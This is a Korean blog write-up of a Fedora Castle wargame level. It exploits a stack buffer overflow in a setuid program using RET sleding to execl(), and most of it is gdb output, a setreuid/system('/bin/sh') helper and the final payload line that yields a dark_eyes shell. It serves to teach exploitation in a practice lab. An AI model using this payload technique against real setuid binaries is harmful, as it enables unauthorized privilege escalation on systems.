[2] iron_golem -> dark_eyes ( RET Sleding )

2017. 11. 28. 13:21SystemHacking/Fedora Catle





iron_golem / blood on the fedora


[ dark_eyes.c ]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
        - hint : RET sleding
*/
 
int main(int argc, char *argv[])
{
        char buffer[256];
        char saved_sfp[4];
 
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }
 
        // save sfp
        memcpy(saved_sfp, buffer+2644);
 
        // overflow!!
        strcpy(buffer, argv[1]);
 
        // restore sfp
        memcpy(buffer+264, saved_sfp, 4);
 
        printf("%s\n", buffer);
}
 
cs


[ gdb darkeyes.cp ]

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x08048408 <main+0>:    push   ebp

0x08048409 <main+1>:    mov    ebp,esp

0x0804840b <main+3>:    sub    esp,0x118

... (생략) ...

0x08048447 <main+63>:   sub    esp,0x4

0x0804844a <main+66>:   push   0x4

0x0804844c <main+68>:   lea    eax,[ebp-264]

0x08048452 <main+74>:   add    eax,0x108

0x08048457 <main+79>:   push   eax

0x08048458 <main+80>:   lea    eax,[ebp-268]

0x0804845e <main+86>:   push   eax

0x0804845f <main+87>:   call   0x8048330 <_init+72> memcpy( ebp-268, ebp-264 ,4 )

0x08048464 <main+92>:   add    esp,0x10

0x08048467 <main+95>:   sub    esp,0x8

0x0804846a <main+98>:   mov    eax,DWORD PTR [ebp+12]

0x0804846d <main+101>:  add    eax,0x4

0x08048470 <main+104>:  push   DWORD PTR [eax]

0x08048472 <main+106>:  lea    eax,[ebp-264]

0x08048478 <main+112>:  push   eax

0x08048479 <main+113>:  call   0x8048350 <_init+104> strcpy( ebp-264 , ebp+12 )

... (생략) ...

0x080484b8 <main+176>:  leave

0x080484b9 <main+177>:  ret

0x080484ba <main+178>:  nop

0x080484bb <main+179>:  nop



[ Stack 구조 ]

save_sfp      4byte        

buffer         256byte    

dummy       8byte       

saved ebp   고정

saved eip             



[ gdb 분석 ]

(gdb) b *0x080484b8

Breakpoint 1 at 0x80484b8

(gdb) run $(python -c 'print "A" * 268 ')

Breakpoint 1, 0x080484b8 in main ()

(gdb) x/24x $ebp-40

0xfeebb110:     0x41414141      0x41414141      0x41414141      0x41414141

0xfeebb120:     0x41414141      0x41414141      0x41414141      0x41414141

[ saved ebp ]

0xfeebb130:     0x41414141      0x41414141      0xfeebb198      0x00730e00

0xfeebb140:     0x00000002      0xfeebb1c4      0xfeebb1d0      0x0070eab6

0xfeebb150:     0x0083eff4      0x00000000      0xfeebb150      0xfeebb198

0xfeebb160:     0xfeebb140      0x00730df5      0x00000000      0x00000000


(gdb) run $(python -c 'print "A" * 272 ')

Breakpoint 1, 0x080484b8 in main ()

(gdb) x/24x $ebp-40

0xfeea5160:     0x41414141      0x41414141      0x41414141      0x41414141

0xfeea5170:     0x41414141      0x41414141      0x41414141      0x41414141

[ saved ebp ] [&ret]

0xfeea5180:     0x41414141      0x41414141      0xfeea51e8      0x41414141

[&ret] [&ret] [&execl] [xxxx]

0xfeea5190:     0x00000000      0xfeea5214      0xfeea5220      0x0070eab6

[cmd] [NULL]

0xfeea51a0:     0x0083eff4      0x00000000      0xfeea51a0      0xfeea51e8

0xfeea51b0:     0xfeea5190      0x00730df5      0x00000000      0x00000000


* int execl(const char *path, const char *arg, ...);

* execl( command , NULL ) 형태로 인자를 구성해주기 위해서  빨간상자 부분의 주소를 선정하였다


(gdb) x/4x 0x0083eff4

0x83eff4 <svcauthsw+712>:       0x0083ed3c      0x00730b96      0x00000000      0x00818df0


gdb를 통해서 메모리를 살펴보면 0xfeea51a0 주소 부분이 항상 일정한 값을 가지고 있음이 확인된다

해당 부분의 값을 인자로 사용하여 execl()함수를 실행시키도록 한다

인자로 사용하기 위해서는 해당 주소는 ebp+8 위치에 있어야 한다


RET Sleding

ret    : pop eip , jmp eip => 다음 실행할 명령어를 EIP 레지스터에 넣고 해당 명령어의 주소로 이동하여 실행한다


[ Stack 구조 ]

saved ebp    0xfeea51e8

saved eip     &ret

&ret

&ret

&execl


ret가 3번 수행되고 마지막에는 pop &execl , jmp &execl 에 의해서 execl()함수가 실행되어진다


[ Shellcode 작성 ]

1
2
3
4
5
6
7
8
9
10
11
12
13
#include<stdio.h>
int main(){
  printf("real_Id: %d\n", getuid());
  printf("set uid: %d\n", geteuid());
  
  setreuid( geteuid() );
 
  system("/bin/sh");
 
 
  return 0;
}
 
cs


 $ vi shell.c

 $ gcc -o /home/iron_golem/shell shell.c


[ Payload 작성 ]

(gdb) p execl

$1 = {<text variable, no debug info>} 0x7a5720 <execl>

0x080484b9 <main+177>:  ret


0x0083eff4 주소에 있는 명령어 0x83ed3c 에는 쉘 실행코드로 링크를 걸어둔다

$ ln -s /home/iron_golem/shell $(python -c 'print "\x3c\xed\x83"')


[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes "$(python -c 'print "A" * 268 + "\xb9\x84\x04\x08" * 3 + "\x20\x57\x7a\x00"')"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAh1▒▒▒▒▒ Wz

real_Id: 501

set uid: 502

sh-3.00$ whoami

dark_eyes

sh-3.00$ id

uid=502(dark_eyes) gid=501(iron_golem) groups=501(iron_golem) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 502

because of you



저작자표시 비영리 변경금지

'SystemHacking > Fedora Catle' 카테고리의 다른 글

FC3 ALL CLREAR  (0) 2017.12.13
[5] evil_wizard -> dark_stone ( GOT Overwriting & Remote BOF )  (0) 2017.12.01
[4] hell_fire -> evil_wizard ( GOT Overwriting )  (0) 2017.11.30
[3] dark_eyes -> hell_fire ( Fake EBP & fgets Cache memory / mprotect)  (0) 2017.11.28
[1] gate -> iron_golem ( Fake EBP )  (0) 2017.11.28

관련글

댓글 0

티스토리툴바